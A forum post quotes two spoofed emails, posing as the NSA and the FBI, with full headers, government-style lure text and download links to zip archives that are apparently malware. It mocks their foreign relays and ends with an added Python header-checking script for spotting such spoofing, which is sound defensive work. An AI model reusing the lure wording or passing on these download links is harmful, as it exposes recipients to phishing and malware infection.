I like how the NSA is sending spam from a third-rate ISP in Pakistan:
From - Wed Dec 9 14:48:37 2009
X-Account-Key: account4
X-UIDL: 0LcA3x-1Nz2UC3QM1-00jdJv
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <postmaster@comsatshosting.net>
Delivery-Date: Wed, 09 Dec 2009 04:48:22 -0500
Received: from spamfilter.comsatshosting.net (ibnsena.comsats.net.pk [210.56.8.55])
by mx.perfora.net (node=mxus2) with ESMTP (Nemesis)
id 0LcA3x-1Nz2UC3QM1-00jdJv for myworkemailaddress@company.com; Wed, 09 Dec 2009 04:48:22 -0500
Received: from spamfilter.comsatshosting.net (spamfilter.comsatshosting.net [127.0.0.1])
by postfix.imss70 (Postfix) with ESMTP id E8BBB3ACE43
for <myworkemailaddress@company.com>; Wed, 9 Dec 2009 01:56:48 +0500 (PKT)
Received: from winserver1.comsatshosting.net (winserver1.comsatshosting.net [64.38.4.122])
by spamfilter.comsatshosting.net (Postfix) with ESMTP id 5D2363ACF50
for <myworkemailaddress@company.com>; Wed, 9 Dec 2009 01:56:48 +0500 (PKT)
Received: from winserver1 [127.0.0.1] by winserver1.comsatshosting.net
(SMTPD-8.22) id AFEC05DC; Wed, 09 Dec 2009 14:37:48 +0500
Date: Wed, 09 Dec 2009 14:37:48 +0500
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS
To: myworkemailaddress@company.com
From: ecus@nsa.gov
Message-Id: <200912091437597.SM04040@winserver1>
X-TM-AS-Product-Ver: IMSS-7.1.0.1224-6.0.0.1038-17058.006
X-TM-AS-Result: No-0.180-4.5-31-1
X-imss-scan-details: No-0.180-4.5-31-1
Envelope-To: myworkemailaddress@company.com
AFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009
CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)
INFORMATION SUBJECT TO EXPORT CONTROL LAWS
WARNING - This document contains technical data whose export is restricted by the Arms Export
Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended
(Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal
penalties. Disseminate IAW DoDD 5230.25.
DESTRUCTION NOTICE - For classified documents, follow the procedures in DOD 5220.22-M, National
Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program,
Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of
contents or reconstruction of the document.
Export of the attached information (which includes, in some circumstances, release to
foreign nationals within the United States) without first obtaining approval or license from
the Department of State for items controlled by the International Traffic in Arms
Regulation (ITAR), or the Department of Commerce for items controlled by the Export
Administration Regulation (EAR), may constitute a violation of law.
Download:
http://www.zeropaid.com/bbs/includes/CYBERCAFE.zip
or
http://rapidshare.com/files/318309046/C ... E.zip.html
http://www.sendspace.com/file/fmbt01
======================
The FBI relays email through a cheap ISP in the UK! Who would've thought?
http://www.enixltd.com/
Obviously this .zip file contains something important, you should download the .exe in it and run it. If it doesn't do anything run it three more times just to be sure. Then call your IT department helpdesk.
From - Sun Feb 21 23:32:35 2010
X-Account-Key: account4
X-UIDL: 0LZhUC-1NLoQx3ffo-00lXxV
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <nobody@abe.enixns.com>
Delivery-Date: Sat, 20 Feb 2010 21:37:16 -0500
Received: from abe.enixns.com (abe.enixns.com [84.45.45.134])
by mx.perfora.net (node=mxus0) with ESMTP (Nemesis)
id 0LZhUC-1NLoQx3ffo-00lXxV for myworkemail@company.com; Sat, 20 Feb 2010 21:37:16 -0500
Received: from nobody by abe.enixns.com with local (Exim 4.69)
(envelope-from <nobody@abe.enixns.com>)
id 1Nj1h4-0007MW-8f for myworkemail@company.com; Sun, 21 Feb 2010 02:37:14 +0000
To: myworkemail@company.com
Subject: INTELLIGENCE BULLETIN
From: cttd@fbi.gov
Message-Id: <E1Nj1h4-0007MW-8f@abe.enixns.com>
Date: Sun, 21 Feb 2010 02:37:14 +0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - abe.enixns.com
X-AntiAbuse: Original Domain - mycompanysdomainname.com
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - abe.enixns.com
Envelope-To: myworkemail@company.com
FEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN
February 2010
Weapons of Mass Destruction Directorate
Indicators for Terrorist Use of Toxic Industrial Chemicals
THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER
PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING
INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.
UNCLASSIFIED//FOR OFFICIAL USE ONLY
Download:
http://timingsolution.com/Doc/BULLETIN.zip
or
http://www.sendspace.com/file/goz3yd
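The mismatch both messages show, a From: address in one domain while the envelope sender and the relay seen by the receiving MX sit in another, can be checked mechanically. The following is an added example, not part of the original post; the function names and finding labels are assumptions made here, and the sample is constructed from the first message's quoted headers.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: key headers of the first message quoted above, folds restored.
SAMPLE = (
    "Return-Path: <postmaster@comsatshosting.net>\n"
    "Received: from spamfilter.comsatshosting.net (ibnsena.comsats.net.pk [210.56.8.55])\n"
    "\tby mx.perfora.net (node=mxus2) with ESMTP (Nemesis)\n"
    "\tid 0LcA3x-1Nz2UC3QM1-00jdJv for myworkemailaddress@company.com;\n"
    "\tWed, 09 Dec 2009 04:48:22 -0500\n"
    "Received: from winserver1 [127.0.0.1] by winserver1.comsatshosting.net\n"
    "\t(SMTPD-8.22) id AFEC05DC; Wed, 09 Dec 2009 14:37:48 +0500\n"
    "To: myworkemailaddress@company.com\n"
    "From: ecus@nsa.gov\n"
    "\n"
    "(body omitted)\n"
)

# "from <HELO name> (<reverse-DNS name> [<IP>])" as written by the receiving MX.
RELAY_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9a-fA-F.:]+)\]\)")

def under(host, domain):
    """True if host equals domain or is a subdomain of it."""
    host, domain = host.lower().rstrip("."), domain.lower().rstrip(".")
    return bool(domain) and (host == domain or host.endswith("." + domain))

def check_sender(raw):
    """Compare the claimed From: domain with the envelope sender and with the
    relay in the topmost Received: header, the only hop the recipient's own
    server wrote; lower Received: lines are supplied by the sending side."""
    msg = message_from_string(raw)
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    rp_dom = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2]
    received = msg.get_all("Received") or []
    m = RELAY_RE.search(received[0]) if received else None
    helo, rdns, ip = m.groups() if m else ("", "", "")
    findings = []
    if not under(rp_dom, from_dom):
        findings.append("return-path-mismatch")
    if not under(rdns, from_dom):
        findings.append("relay-not-in-from-domain")
    if m and not under(helo, rdns) and not under(rdns, helo):
        findings.append("helo-rdns-mismatch")
    return {"from": from_dom, "return_path": rp_dom, "helo": helo,
            "rdns": rdns, "ip": ip, "findings": findings}

if __name__ == "__main__":
    print(check_sender(SAMPLE))
```

These findings are triage signals only: mailing lists and bulk-mail providers legitimately send with a Return-Path outside the From: domain, which is why receivers rely on SPF, DKIM and DMARC for the actual decision.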